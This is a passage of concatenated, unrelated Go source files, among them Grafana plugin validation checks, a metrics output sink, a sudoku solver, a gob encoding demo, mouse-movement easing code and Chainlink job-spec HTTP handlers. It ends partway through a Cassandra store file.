			urls = append(urls, path)
		} else {
			errs = append(errs, ValidationComment{
				Severity: checkSeverityError,
				Message:  "README contains a relative link",
				Details:  fmt.Sprintf("Relative links are not supported by Grafana and results in broken links wherever we display the README. Please convert `%s` into an absolute link.", path),
			})
		}
	}

	type urlstatus struct {
		url    string
		status string
	}

	// Probe every URL in parallel; broken ones are reported on brokenCh,
	// which is closed once all probes have finished.
	brokenCh := make(chan urlstatus)
	var wg sync.WaitGroup
	wg.Add(len(urls))
	for _, u := range urls {
		go func(url string) {
			defer wg.Done()
			resp, err := http.Get(url)
			if err != nil {
				brokenCh <- urlstatus{url: url, status: err.Error()}
				return
			}
			// Close the body so the underlying connection is released and
			// can be reused; the previous version leaked it for every URL.
			defer resp.Body.Close()
			if resp.StatusCode != http.StatusOK {
				brokenCh <- urlstatus{url: url, status: resp.Status}
			}
		}(u)
	}
	go func() {
		wg.Wait()
		close(brokenCh)
	}()

	for link := range brokenCh {
		errs = append(errs, ValidationComment{
			Severity: checkSeverityError,
			Message:  "README contains a broken link",
			Details:  fmt.Sprintf("Something went wrong when we tried looking up [%s](%s) (`%s`).", link.url, link.url, link.status),
		})
	}

	return errs, nil
}
type screenshotChecker struct{}

// check warns when plugin.json declares no screenshots, and errors on any
// declared screenshot path that cannot be found in the dist or src
// directories.
func (c screenshotChecker) check(ctx *checkContext) ([]ValidationComment, error) {
	var data struct {
		Info struct {
			Screenshots []struct {
				Name string `json:"name"`
				Path string `json:"path"`
			} `json:"screenshots"`
		} `json:"info"`
	}
	// Malformed metadata is deliberately ignored here; schema validation
	// is the responsibility of a separate checker.
	if err := json.Unmarshal(ctx.Metadata, &data); err != nil {
		return nil, nil
	}
	if len(data.Info.Screenshots) == 0 {
		return []ValidationComment{
			{
				Severity: checkSeverityWarning,
				Message: "Plugin is missing screenshots",
				Details: "Screenshots help users understand what your plugin does, and how to use it. Consider providing screenshots to your plugin by adding them under `info.screenshots` in the `plugin.json` file. For more information, refer to the [reference documentation](https://grafana.com/docs/grafana/latest/developers/plugins/metadata/#screenshots).",
			},
		}, nil
	}
	var errs []ValidationComment
	for _, ss := range data.Info.Screenshots {
		// fallbackDir resolves the path against dist/ first, then src/.
		_, err := fallbackDir(ss.Path, ctx.DistDir, ctx.SrcDir)
		if err != nil {
			if err == errFileNotFound {
				errs = append(errs, ValidationComment{
					Severity: checkSeverityError,
					Message: fmt.Sprintf("File not found: %s", ss.Path),
					Details: "We couldn't find the specified file. Make sure that the file exists.",
				})
				continue
			}
			return nil, err
		}
	}
	return errs, nil
}
type developerJargonChecker struct{}

// check checks whether the README contains developer jargon.
func (c developerJargonChecker) check(ctx *checkContext) ([]ValidationComment, error) {
	jargon := [][]byte{
		[]byte("yarn"),
		[]byte("nodejs"),
	}
	hasJargon := false
	for _, word := range jargon {
		if bytes.Contains(ctx.Readme, word) {
			hasJargon = true
			break
		}
	}
	if !hasJargon {
		return nil, nil
	}
	return []ValidationComment{
		{
			Severity: checkSeverityWarning,
			Message:  "README contains developer jargon",
			Details:  "Grafana uses the README within the application to help users understand how to use your plugin. Instructions for building and testing the plugin can be confusing for the end user. You can maintain separate instructions for users and developers by replacing the README in the dist directory with the user documentation.",
		},
	}, nil
}
type distExistsChecker struct{}

// check verifies that the plugin ships a dist directory containing a
// production build.
func (c *distExistsChecker) check(ctx *checkContext) ([]ValidationComment, error) {
	if _, err := os.Stat(ctx.DistDir); err != nil {
		if !os.IsNotExist(err) {
			return nil, err
		}
		return []ValidationComment{
			{
				Severity: checkSeverityError,
				Message:  "Missing dist directory",
				Details:  "Grafana requires a production build of your plugin. Run `yarn build` and `git add -f dist/` in your release branch to add the production build.",
			},
		}, nil
	}
	return nil, nil
}
type pluginIDHasTypeSuffixChecker struct{}

// check checks that the type in the plugin ID is the same as the type defined
// in plugin.json.
func (c *pluginIDHasTypeSuffixChecker) check(ctx *checkContext) ([]ValidationComment, error) {
	var meta struct {
		ID   string `json:"id"`
		Type string `json:"type"`
	}
	if err := json.Unmarshal(ctx.Metadata, &meta); err != nil {
		return nil, err
	}
	if meta.Type == "" {
		return nil, nil
	}
	// The last dash-separated segment of the ID must equal the type.
	parts := strings.Split(meta.ID, "-")
	if parts[len(parts)-1] == meta.Type {
		return nil, nil
	}
	return []ValidationComment{
		{
			Severity: checkSeverityError,
			Message:  "Plugin ID and type doesn't match",
			Details:  fmt.Sprintf(`The plugin ID must end with the plugin type. Add "-%s" at the end of your plugin ID.`, meta.Type),
		},
	}, nil
}
type pluginIDFormatChecker struct{}

// check checks whether the plugin ID follows the naming conventions.
func (c *pluginIDFormatChecker) check(ctx *checkContext) ([]ValidationComment, error) {
	var meta struct {
		ID string `json:"id"`
	}
	if err := json.Unmarshal(ctx.Metadata, &meta); err != nil {
		return nil, err
	}
	if meta.ID == "" {
		return nil, nil
	}
	// Valid IDs have two or three dash-separated segments.
	if n := len(strings.Split(meta.ID, "-")); n >= 2 && n <= 3 {
		return nil, nil
	}
	return []ValidationComment{
		{
			Severity: checkSeverityError,
			Message:  "Invalid ID format",
			Details:  "A plugin ID must have the form `<username>-<name>-<type>` or `<username>-<type>`, where\n\n- `username` is the [Grafana.com](https://grafana.com) account that owns the plugin\n- `name` is the name of the plugin\n- `type` is the type of the plugin and must be one of `panel`, `datasource`, or `app`",
		},
	}, nil
}
type pluginNameChecker struct{}

// check checks whether the plugin ID and name are the same.
func (c *pluginNameChecker) check(ctx *checkContext) ([]ValidationComment, error) {
	var meta struct {
		ID   string `json:"id"`
		Name string `json:"name"`
	}
	if err := json.Unmarshal(ctx.Metadata, &meta); err != nil {
		return nil, err
	}
	if meta.ID == "" || meta.Name == "" || meta.ID != meta.Name {
		return nil, nil
	}
	return []ValidationComment{
		{
			Severity: checkSeverityWarning,
			Message:  "Plugin name and ID are the same",
			Details:  "While the `id` property must be readable by a machine, the `name` of a plugin should be human-friendly.",
		},
	}, nil
}
// jsonSchemaChecker validates plugin.json against a JSON Schema file.
type jsonSchemaChecker struct {
	// schema is the (possibly relative) path to the schema file.
	schema string
}

// check validates the plugin.json file against a JSON Schema.
func (c *jsonSchemaChecker) check(ctx *checkContext) ([]ValidationComment, error) {
	var errs []ValidationComment
	// gojsonschema requires absolute path to the schema.
	schemaPath, err := filepath.Abs(c.schema)
	if err != nil {
		return nil, err
	}
	schemaLoader := gojsonschema.NewReferenceLoader("file://" + schemaPath)
	documentLoader := gojsonschema.NewReferenceLoader("file://" + ctx.MetadataPath)
	result, err := gojsonschema.Validate(schemaLoader, documentLoader)
	if err != nil {
		return nil, err
	}
	if !result.Valid() {
		// One ValidationComment per schema violation.
		for _, desc := range result.Errors() {
			errs = append(errs, ValidationComment{
				Severity: checkSeverityError,
				Message: "Invalid plugin.json",
				Details: fmt.Sprintf("`%s`: %s\n\nFor more information, refer to the [reference documentation](https://grafana.com/docs/grafana/latest/developers/plugins/metadata/).", desc.Field(), desc.Description()),
			})
		}
	}
	return errs, nil
}
// packageVersionMatchChecker ensures the version in package.json matches
// info.version in the built plugin.json.
type packageVersionMatchChecker struct {
	schema string
}

// check reads both manifests and reports an error comment when the two
// versions differ.
func (c *packageVersionMatchChecker) check(ctx *checkContext) ([]ValidationComment, error) {
	packageFile, err := ioutil.ReadFile(filepath.Join(ctx.RootDir, "package.json"))
	if err != nil {
		return nil, err
	}
	var pkg struct {
		Version string `json:"version"`
	}
	if err := json.Unmarshal(packageFile, &pkg); err != nil {
		return nil, err
	}
	pluginFile, err := ioutil.ReadFile(filepath.Join(ctx.DistDir, "plugin.json"))
	if err != nil {
		return nil, err
	}
	var plugin struct {
		Info struct {
			Version string `json:"version"`
		} `json:"info"`
	}
	if err := json.Unmarshal(pluginFile, &plugin); err != nil {
		return nil, err
	}
	if plugin.Info.Version != pkg.Version {
		return []ValidationComment{
			{
				Severity: checkSeverityError,
				Message:  "Mismatched package version",
				// Fixed: the original message was missing the closing backtick
				// after `plugin.json`.
				Details: "The `version` in `package.json` needs to match the `info.version` in `plugin.json`. Set `info.version` in `plugin.json` to `%VERSION%` to use the version found in package.json when building the plugin.",
			},
		}, nil
	}
	return nil, nil
}
// logosExistChecker verifies that the small and large logo files referenced by
// plugin.json actually exist under the source directory.
type logosExistChecker struct{}

// check reads the logo paths from plugin.json (preferring the dist copy) and
// reports an error comment for each referenced logo file that is missing.
func (c *logosExistChecker) check(ctx *checkContext) ([]ValidationComment, error) {
	path, err := fallbackDir("plugin.json", ctx.DistDir, ctx.SrcDir)
	if err != nil {
		if err == errFileNotFound {
			// No plugin.json anywhere: nothing to validate here.
			return nil, nil
		}
		return nil, err
	}
	pluginFile, err := ioutil.ReadFile(path)
	if err != nil {
		return nil, err
	}
	var plugin struct {
		Info struct {
			Logos struct {
				Small string `json:"small"`
				Large string `json:"large"`
			} `json:"logos"`
		} `json:"info"`
	}
	if err := json.Unmarshal(pluginFile, &plugin); err != nil {
		return nil, err
	}
	// The small- and large-logo checks were previously duplicated inline;
	// both now go through missingLogoComments.
	var errs []ValidationComment
	errs = append(errs, missingLogoComments(ctx.SrcDir, plugin.Info.Logos.Small)...)
	errs = append(errs, missingLogoComments(ctx.SrcDir, plugin.Info.Logos.Large)...)
	return errs, nil
}

// missingLogoComments returns an error comment when a non-empty logo path does
// not resolve to an existing file under srcDir. Stat errors other than
// "not exist" are ignored, matching the original behavior.
func missingLogoComments(srcDir, logoPath string) []ValidationComment {
	if logoPath == "" {
		return nil
	}
	if _, err := os.Stat(filepath.Join(srcDir, logoPath)); os.IsNotExist(err) {
		return []ValidationComment{{
			Severity: checkSeverityError,
			Message:  fmt.Sprintf("File not found: %q", logoPath),
			Details:  "We couldn't find the specified file. Make sure that the file exists.",
		}}
	}
	return nil
}
// orgExistsChecker verifies that a Grafana.com organization or user exists for
// the username prefix of the plugin ID.
type orgExistsChecker struct {
	username string
	client   *grafana.Client
}

// check looks the username up via the Grafana.com API. A missing account
// produces an error comment; a private organization is accepted silently.
func (c *orgExistsChecker) check(ctx *checkContext) ([]ValidationComment, error) {
	_, err := c.client.FindOrgBySlug(c.username)
	switch err {
	case nil, grafana.ErrPrivateOrganization:
		return nil, nil
	case grafana.ErrOrganizationNotFound:
		return []ValidationComment{{
			Severity: checkSeverityError,
			Message:  "Missing Grafana.com account",
			Details:  fmt.Sprintf("The first part of the plugin ID must be a valid Grafana.com organization or user. [Sign up on Grafana.com](https://grafana.com/signup/starter/connect-account) to claim **%s**.", c.username),
		}}, nil
	default:
		return nil, err
	}
}
// templateReadmeChecker detects a README.md left unmodified from the plugin
// template repositories.
type templateReadmeChecker struct{}

// check warns when the README still begins with one of the template titles,
// i.e. the author has not replaced the boilerplate.
func (c *templateReadmeChecker) check(ctx *checkContext) ([]ValidationComment, error) {
	re := regexp.MustCompile("^# Grafana (Panel|Data Source|Data Source Backend) Plugin Template")
	m := re.Find(ctx.Readme)
	if m != nil {
		return []ValidationComment{
			{
				Severity: checkSeverityWarning,
				Message:  "Found template README.md",
				Details:  "It looks like you haven't updated the README.md that was provided by the plugin template. Update the README with information about your plugin and how to use it.",
			},
		}, nil
	}
	return nil, nil
}
// pluginPlatformChecker warns when the plugin module appears to use the legacy
// Angular-based plugin platform rather than the React-based one.
type pluginPlatformChecker struct{}

// check scans module.ts (falling back to module.js) for Angular controller
// identifiers and warns when no React plugin classes are present.
func (c *pluginPlatformChecker) check(ctx *checkContext) ([]ValidationComment, error) {
	modulePath, err := fallbackDir("module.ts", ctx.DistDir, ctx.SrcDir)
	if err != nil {
		modulePath, err = fallbackDir("module.js", ctx.DistDir, ctx.SrcDir)
		if err != nil {
			// No module file at all: nothing to check.
			return nil, nil
		}
	}
	b, err := ioutil.ReadFile(modulePath)
	if err != nil {
		// Fixed: the original silently ignored this error (empty if body) and
		// then matched the regexps against a nil buffer.
		return nil, err
	}
	reactExp := regexp.MustCompile(`(DataSourcePlugin|PanelPlugin)`)
	angularExp := regexp.MustCompile(`\s(PanelCtrl|QueryCtrl|QueryOptionsCtrl|ConfigCtrl)`)
	if angularExp.Match(b) && !reactExp.Match(b) {
		return []ValidationComment{
			{
				Severity: checkSeverityWarning,
				Message:  "Plugin uses legacy platform",
				Details:  "Grafana 7.0 introduced a new plugin platform based on [ReactJS](https://reactjs.org/). We currently have no plans of removing support for Angular-based plugins, but we encourage you migrate your plugin to the new platform.",
			},
		}, nil
	}
	return nil, nil
}
// errFileNotFound is returned by fallbackDir when the file exists in none of
// the candidate directories.
var errFileNotFound = errors.New("file not found")

// fallbackDir looks for a filename in a number of directories, and returns the
// path to the first path to exist. When the file is absent from every
// directory it returns errFileNotFound; any other stat error aborts the scan.
func fallbackDir(filename string, dirs ...string) (string, error) {
	for _, dir := range dirs {
		path := filepath.Join(dir, filename)
		ok, err := fileExists(path)
		if err != nil {
			return "", err
		}
		if ok {
			return path, nil
		}
	}
	return "", errFileNotFound
}
func fileExists(path string) (bool, error) {
if _, err := os.Stat(path); err != nil {
if os.IsNotExist(err) {
return false, nil
}
return false, err
}
return true, nil
}
|
package sinks
import (
"encoding/json"
"fmt"
"os"
"strings"
// "time"
lp "github.com/ClusterCockpit/cc-metric-collector/pkg/ccMetric"
)
// StdoutSink writes metrics in InfluxDB line protocol to stdout, stderr, or a
// regular file, depending on configuration.
type StdoutSink struct {
	sink // meta_as_tags, name
	// output is the destination stream; defaults to os.Stdout.
	output *os.File
	config struct {
		defaultSinkConfig
		// Output selects the destination: "stdout" (default), "stderr", or a
		// file path.
		Output string `json:"output_file,omitempty"`
	}
}
// Write renders the metric in line protocol and writes it to the configured
// output stream. The write error is now returned to the caller (the original
// discarded it and always returned nil).
func (s *StdoutSink) Write(m lp.CCMetric) error {
	_, err := fmt.Fprint(
		s.output,
		m.ToLineProtocol(s.meta_as_tags),
	)
	return err
}
// Flush syncs the output file to stable storage and reports the error for
// regular files. Sync errors on the standard streams are still swallowed,
// because many platforms return errors (e.g. EINVAL) when syncing a tty or
// pipe and those are not actionable.
func (s *StdoutSink) Flush() error {
	err := s.output.Sync()
	if s.output == os.Stdout || s.output == os.Stderr {
		return nil
	}
	return err
}
// Close closes the output file unless it is one of the process's standard
// streams, which must remain open.
func (s *StdoutSink) Close() {
	switch s.output {
	case os.Stdout, os.Stderr:
		// Never close the shared standard streams.
	default:
		s.output.Close()
	}
}
// NewStdoutSink builds a StdoutSink from its JSON configuration. The output
// defaults to stdout; "stderr" selects stderr, and any other non-empty value
// is treated as a file path (created if missing, mode 0600).
func NewStdoutSink(name string, config json.RawMessage) (Sink, error) {
	s := new(StdoutSink)
	s.name = fmt.Sprintf("StdoutSink(%s)", name)
	if len(config) > 0 {
		if err := json.Unmarshal(config, &s.config); err != nil {
			return nil, err
		}
	}
	switch strings.ToLower(s.config.Output) {
	case "", "stdout":
		s.output = os.Stdout
	case "stderr":
		s.output = os.Stderr
	default:
		f, err := os.OpenFile(s.config.Output, os.O_CREATE|os.O_WRONLY, os.FileMode(0600))
		if err != nil {
			return nil, err
		}
		s.output = f
	}
	// Create lookup map to use meta infos as tags in the output metric.
	s.meta_as_tags = make(map[string]bool)
	for _, key := range s.config.MetaAsTags {
		s.meta_as_tags[key] = true
	}
	return s, nil
}
|
package main
import "fmt"
// 37. 解数独
// 编写一个程序,通过已填充的空格来解决数独问题。
// 一个数独的解法需遵循如下规则:
// 数字 1-9 在每一行只能出现一次。
// 数字 1-9 在每一列只能出现一次。
// 数字 1-9 在每一个以粗实线分隔的 3x3 宫内只能出现一次。
// Note:
// 给定的数独序列只包含数字 1-9 和字符 '.' 。
// 你可以假设给定的数独只有唯一解。
// 给定数独永远是 9x9 形式的。
// https://leetcode-cn.com/problems/sudoku-solver
// main solves the LeetCode 37 example board in place and prints the result.
// https://leetcode-cn.com/problems/sudoku-solver
func main() {
	rows := []string{
		"53..7....",
		"6..195...",
		".98....6.",
		"8...6...3",
		"4..8.3..1",
		"7...2...6",
		".6....28.",
		"...419..5",
		"....8..79",
	}
	board := make([][]byte, len(rows))
	for i, r := range rows {
		board[i] = []byte(r)
	}
	solveSudoku(board)
	fmt.Println(board)
}
// solveSudoku fills board in place using backtracking with bitmask
// bookkeeping: rows[i], cols[j] and boxes[b] each hold a 9-bit set of the
// digits already placed in that row, column, or 3x3 box.
func solveSudoku(board [][]byte) {
	var rows, cols, boxes [9]int
	for i := range board {
		for j, cell := range board[i] {
			if cell == '.' {
				continue
			}
			bit := 1 << (cell - '1')
			rows[i] |= bit
			cols[j] |= bit
			boxes[i/3*3+j/3] |= bit
		}
	}
	sudokuHelper(board, 0, 0, rows, cols, boxes)
}
// sudokuHelper tries to fill cell (i, j) and recurses cell-by-cell in row
// order. The bitmask arrays are passed by value, so each recursion level sees
// its own copy; the explicit XOR-undo below restores this level's copy before
// trying the next candidate. Returns true once the whole board is solved.
func sudokuHelper(board [][]byte, i, j int, row, line, squ [9]int) bool {
	// Past the last column: move to the next row.
	if j == 9 {
		return sudokuHelper(board, i+1, 0, row, line, squ)
	}
	// Past the last row: every cell is filled, so the board is solved.
	if i == 9 {
		return true
	}
	// Pre-filled cell: skip ahead.
	if board[i][j] != '.' {
		return sudokuHelper(board, i, j+1, row, line, squ)
	}
	squNo := i/3*3 + j/3
	// Try each digit '1'..'9' that is not yet used in this row/column/box.
	for b := '1'; b <= '9'; b++ {
		n := int(b - '1')
		if !checkUsedNum(n, row[i], line[j], squ[squNo]) {
			offset := 1 << n
			// Place the digit and mark it used.
			board[i][j] = byte(b)
			row[i] |= offset
			line[j] |= offset
			squ[squNo] |= offset
			if sudokuHelper(board, i, j+1, row, line, squ) {
				return true
			}
			// Backtrack: clear the cell and un-mark the digit.
			board[i][j] = '.'
			row[i] ^= offset
			line[j] ^= offset
			squ[squNo] ^= offset
		}
	}
	// No digit fits here under the current partial assignment.
	return false
}
// checkUsedNum reports whether digit n (0-based) already appears in the given
// row, column, or 3x3-box bitmask.
func checkUsedNum(n, row, col, squ int) bool {
	mask := 1 << n
	return row&mask != 0 || col&mask != 0 || squ&mask != 0
}
|
package main
import (
"fmt"
"github.com/nbgucer/advent-of-code-2018/utils"
)
// main reads the day-2 puzzle input as a slice of box IDs and prints the
// common characters of the closest pair together with its length.
func main() {
	// NOTE(review): the escaped-backslash path is Windows-specific; consider
	// filepath.Join for portability.
	fileName := "days\\day-2\\input"
	stringSlice := utils.GetInputAsSlice(fileName)
	commonIdPart := FindCommonIdPart(stringSlice)
	fmt.Printf("\n Result is %v with a closeness of %v within %v \n", commonIdPart, len(commonIdPart), len(stringSlice[0]))
}
// FindCommonIdPart compares every pair of IDs and returns the longest run of
// position-matching characters found across all pairs.
func FindCommonIdPart(stringSlice []string) string {
	best := ""
	for i, a := range stringSlice {
		for _, b := range stringSlice[i+1:] {
			if common := FindCloseness(a, b); len(common) > len(best) {
				best = common
			}
		}
	}
	return best
}
// FindCloseness returns the characters (in order) at positions where a and b
// agree. Comparison stops at the end of the shorter string, so inputs of
// different lengths no longer panic with an index-out-of-range (the original
// indexed b by a's length).
func FindCloseness(a string, b string) string {
	n := len(a)
	if len(b) < n {
		n = len(b)
	}
	output := ""
	for i := 0; i < n; i++ {
		if a[i] == b[i] {
			output += string(a[i])
		}
	}
	return output
}
|
package main
import (
"fmt"
"os"
)
// main parses address, password, and command from the command line, logs in
// to the remote server, sends the command, and prints the response. Any error
// along the way terminates the process with status 1.
func main() {
	address, password, command, err := ParseCommandLineArgs()
	printErrAndExit(err)
	client, err := NewClient(address)
	printErrAndExit(err)
	err = client.Login(password)
	printErrAndExit(err)
	response, err := client.SendCommandNaively(command)
	printErrAndExit(err)
	fmt.Println(response)
}
// printErrAndExit prints err and terminates the process with status 1.
// A nil err is a no-op.
func printErrAndExit(err error) {
	if err == nil {
		return
	}
	fmt.Println(err)
	os.Exit(1)
}
|
package fakes
import (
bmins "github.com/cloudfoundry/bosh-micro-cli/deployer/instance"
)
// FakeInstanceFactory is a test double that records the mbus URL passed to
// Create and returns a pre-configured instance.
type FakeInstanceFactory struct {
	// CreateMbusURL captures the argument of the last Create call.
	CreateMbusURL string
	// CreateInstance is the canned instance Create returns.
	CreateInstance bmins.Instance
}

// NewFakeInstanceFactory returns an empty fake, ready for stubbing.
func NewFakeInstanceFactory() *FakeInstanceFactory {
	return &FakeInstanceFactory{}
}

// Create records mbusURL and returns the stubbed instance.
func (f *FakeInstanceFactory) Create(mbusURL string) bmins.Instance {
	f.CreateMbusURL = mbusURL
	return f.CreateInstance
}
|
package split
import (
"testing"
)
func TestSplitMultiSep(t *testing.T) {
s := "Python,JavaScript Twitter"
result := SplitMultiSep(s, []string{"&",","," "})
t.Logf("result is %v",result)
for i := range result{
t.Log(result[i])
}
} |
package main
import (
"bytes"
"encoding/gob"
"fmt"
"log"
)
// P is the sender-side example type for the gob demonstration below.
type P struct {
	X, Y, Z int
	Name    string
	Tags    []string
	Attr    map[string]string
}
// Q is the receiver-side type: it omits Z and narrows X and Y to int32,
// demonstrating gob's tolerance for differing-but-compatible struct shapes.
type Q struct {
	X, Y int32
	Name string
	Tags []string
	Attr map[string]string
}
// main demonstrates gob's flexible decoding: a P value is encoded into an
// in-memory buffer and decoded into the narrower Q type, which keeps only the
// fields the two types share and silently drops Z.
func main() {
	var network bytes.Buffer
	enc := gob.NewEncoder(&network) // encoder writing into the buffer
	dec := gob.NewDecoder(&network) // decoder reading from the same buffer
	p := &P{
		X:    3,
		Y:    4,
		Z:    5,
		Name: "test",
		Tags: []string{"PHP", "Laravel", "Go"},
		Attr: map[string]string{"website": "https://xueyuanjun.com"},
	}
	// Encode (as a sender would).
	if err := enc.Encode(p); err != nil {
		log.Fatal("encode error:", err)
	}
	// Decode into Q (as a receiver would).
	var q Q
	if err := dec.Decode(&q); err != nil {
		log.Fatal("decode error:", err)
	}
	fmt.Printf("%q: {%d,%d}, Tags: %v, Attr: %v\n", q.Name, q.X, q.Y, q.Tags, q.Attr)
}
|
/*
Copyright 2017, Yoshiki Shibukawa
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package gotomation
import (
"time"
)
// MouseButton identifies a physical mouse button for click and drag calls.
type MouseButton int

// Mouse button identifiers.
const (
	// NOTE(review): only MouseLeft is explicitly typed MouseButton;
	// MouseCenter and MouseRight are untyped constants — consider typing all
	// three for consistency.
	MouseLeft MouseButton = 1
	MouseCenter = 2
	MouseRight = 3
)
// easeInOutCubic interpolates each [start, end] pair in values over duration
// using Robert Penner's easeInOutCubic curve, invoking callback with the
// current values roughly every 16ms (~60fps). The final frame always reports
// the exact end values. Any error returned by callback aborts the animation
// and is propagated (the original silently discarded the error of the final
// and the zero-duration callback invocations). The unused lastValue slice has
// been removed.
func easeInOutCubic(values [][2]int, duration time.Duration, callback func([]int) error) error {
	count := int(duration / (time.Millisecond * 16))
	delta := make([]float64, len(values))
	finalValue := make([]int, len(values))
	for i, value := range values {
		delta[i] = float64(value[1] - value[0])
		finalValue[i] = value[1]
	}
	// Duration too short to animate: jump straight to the end values.
	if count == 0 {
		return callback(finalValue)
	}
	for f := 0; f < count; f++ {
		time.Sleep(time.Millisecond * 16)
		if f+1 == count {
			// Last frame: report exact end values to avoid rounding drift.
			return callback(finalValue)
		}
		t := float64(f) / float64(count) * 2.0
		var dt float64
		if t < 1.0 {
			dt = 0.5 * t * t * t
		} else {
			t -= 2
			dt = 0.5*t*t*t + 1.0
		}
		currentValues := make([]int, len(values))
		for i, value := range values {
			currentValues[i] = value[0] + int(delta[i]*dt)
		}
		if err := callback(currentValues); err != nil {
			return err
		}
	}
	return nil
}
/*
Move moves the mouse cursor to (x, y) over duration with Robert Penner's
easing function easeInOutCubic:
http://robertpenner.com/easing/
*/
func (m *Mouse) Move(x, y int, duration time.Duration) error {
	sx, sy := m.GetPosition()
	return easeInOutCubic([][2]int{{sx, x}, {sy, y}}, duration, func(value []int) error {
		return m.MoveQuickly(value[0], value[1])
	})
}
// Click performs a single click with the left button.
func (m *Mouse) Click() error {
	return m.ClickWith(MouseLeft)
}

// DoubleClick performs a double click with the left button.
func (m *Mouse) DoubleClick() error {
	return m.DoubleClickWith(MouseLeft)
}

// Drag drags to (x, y) with the left button held down.
func (m *Mouse) Drag(x, y int) error {
	return m.DragWith(MouseLeft, x, y)
}
// Scroll scrolls by (x, y) in total over duration using the easeInOutCubic
// curve. Because ScrollQuickly takes relative deltas, each frame sends only
// the difference from the previously reported position.
func (m *Mouse) Scroll(x, y int, duration time.Duration) error {
	lastValues := []int{0, 0}
	return easeInOutCubic([][2]int{{0, x}, {0, y}}, duration, func(values []int) error {
		err := m.ScrollQuickly(values[0]-lastValues[0], values[1]-lastValues[1])
		copy(lastValues, values)
		return err
	})
}
|
package naive
import (
"reflect"
"testing"
"github.com/fdingiit/matching-algorithms/matcher"
"github.com/fdingiit/matching-algorithms/test"
)
// TestNaiveMatch registers every subscription from the shared basic test
// cases with a naive matcher, then verifies each case's product matches
// exactly the expected set of subscriptions.
func TestNaiveMatch(t *testing.T) {
	var m matcher.Matcher
	m = NewMatcher()
	// Register all subscriptions up front so matches can span cases.
	for _, sub := range test.BasicCases {
		m.Add(sub.Subscriptions...)
	}
	for _, tt := range test.BasicCases {
		t.Run(tt.Name, func(t *testing.T) {
			if got := m.Match(tt.Args.Product); !reflect.DeepEqual(got, tt.Wanted) {
				t.Errorf("Match() = %+v, want %+v", got, tt.Wanted)
			}
		})
	}
}
|
// +build ignore
// The thumbnail command produces thumbnails of JPEG files
// whose names are provided on each line of the standard input.
//
// The "+build ignore" tag excludes this file from the thumbnail package,
// but it can be compiled as a command and run like this:
//
// Run with:
// $ go run main.go
// foo.jpeg
// ^d
package main
import (
"bufio"
"fmt"
"log"
"os"
"github.com/awmorgan/gobook/ch8/thumbnail"
)
// main reads image file names from standard input, one per line, and prints
// the path of the generated thumbnail for each. Per-file failures are logged
// and skipped; a scanner failure is fatal.
func main() {
	input := bufio.NewScanner(os.Stdin)
	for input.Scan() {
		thumb, err := thumbnail.ImageFile(input.Text())
		if err != nil {
			log.Print(err)
			continue
		}
		fmt.Println(thumb)
	}
	// Report any read error on stdin after the loop, per bufio.Scanner docs.
	if err := input.Err(); err != nil {
		log.Fatal(err)
	}
}
|
package mocking
// DoStuffer is a simple single-method interface, useful as a seam for
// generating mocks in tests.
type DoStuffer interface {
	// DoStuff processes input and returns an error when processing fails.
	DoStuff(input string) error
}
|
package web
import (
"net/http"
"github.com/gin-gonic/gin"
"github.com/pkg/errors"
"github.com/smartcontractkit/chainlink/core/services"
"github.com/smartcontractkit/chainlink/core/services/chainlink"
"github.com/smartcontractkit/chainlink/core/services/offchainreporting"
"github.com/smartcontractkit/chainlink/core/store/models"
"github.com/smartcontractkit/chainlink/core/store/orm"
)
// OCRJobSpecsController manages OCR job spec requests.
type OCRJobSpecsController struct {
	// App provides access to stores and job services.
	App chainlink.Application
}
// Create validates, saves, and starts a new OCR job spec.
// Example:
//  "<application>/ocr/specs"
// Responds 400 for an invalid spec, 501 when the offchain reporting feature
// is disabled, 500 on storage errors, and 200 with the new job ID.
func (ocrjsc *OCRJobSpecsController) Create(c *gin.Context) {
	jobSpec, err := services.ValidatedOracleSpec(c.Request.Body)
	if err != nil {
		jsonAPIError(c, http.StatusBadRequest, err)
		return
	}
	// Offchain reporting jobs are gated behind dev mode or the feature flag.
	config := ocrjsc.App.GetStore().Config
	if jobSpec.JobType() == offchainreporting.JobType && !config.Dev() && !config.FeatureOffchainReporting() {
		jsonAPIError(c, http.StatusNotImplemented, errors.New("The Offchain Reporting feature is disabled by configuration"))
		return
	}
	jobID, err := ocrjsc.App.AddJobV2(c.Request.Context(), jobSpec)
	if err != nil {
		jsonAPIError(c, http.StatusInternalServerError, err)
		return
	}
	c.JSON(http.StatusOK, struct {
		JobID int32 `json:"jobID"`
	}{jobID})
}
// Delete soft deletes an OCR job spec.
// Example:
//  "<application>/ocr/specs/:ID"
// Responds 422 for an unparseable ID, 404 when the job does not exist, 500 on
// other errors, and 204 on success.
func (ocrjsc *OCRJobSpecsController) Delete(c *gin.Context) {
	jobSpec := models.JobSpecV2{}
	err := jobSpec.SetID(c.Param("ID"))
	if err != nil {
		jsonAPIError(c, http.StatusUnprocessableEntity, err)
		return
	}
	err = ocrjsc.App.DeleteJobV2(c.Request.Context(), jobSpec.ID)
	// Unwrap to distinguish "not found" from other storage failures.
	if errors.Cause(err) == orm.ErrorNotFound {
		jsonAPIError(c, http.StatusNotFound, errors.New("JobSpec not found"))
		return
	}
	if err != nil {
		jsonAPIError(c, http.StatusInternalServerError, err)
		return
	}
	jsonAPIResponseWithStatus(c, nil, "job", http.StatusNoContent)
}
|
package cassandra
import (
"context"
"strconv"
"strings"
"time"
"github.com/afex/hystrix-go/hystrix"
"github.com/ankurs/Feed/Feed/service/store/db"
"github.com/carousell/Orion/utils/errors"
"github.com/carousell/Orion/utils/log"
"github.com/carousell/Orion/utils/spanutils"
"github.com/gocql/gocql"
"github.com/pborman/uuid"
)
// cas is the Cassandra-backed store implementation: a gocql session plus the
// default consistency level applied to queries.
type cas struct {
	casSes      *gocql.Session
	consistency gocql.Consistency
}
// CassandraExec runs query at the session's default consistency level; see
// CassandraExecWithConsistency for the execution semantics.
func (c *cas) CassandraExec(ctx context.Context, name, query string, values []interface{}, dest []interface{}) error {
	return c.CassandraExecWithConsistency(ctx, name, query, values, dest, c.consistency)
}
// CassandraExecWithConsistency runs query at the given consistency level
// inside a hystrix circuit named name, tracing the call as a zipkin datastore
// span. With an empty dest the statement is executed for effect; otherwise
// the first result row is scanned into dest.
//
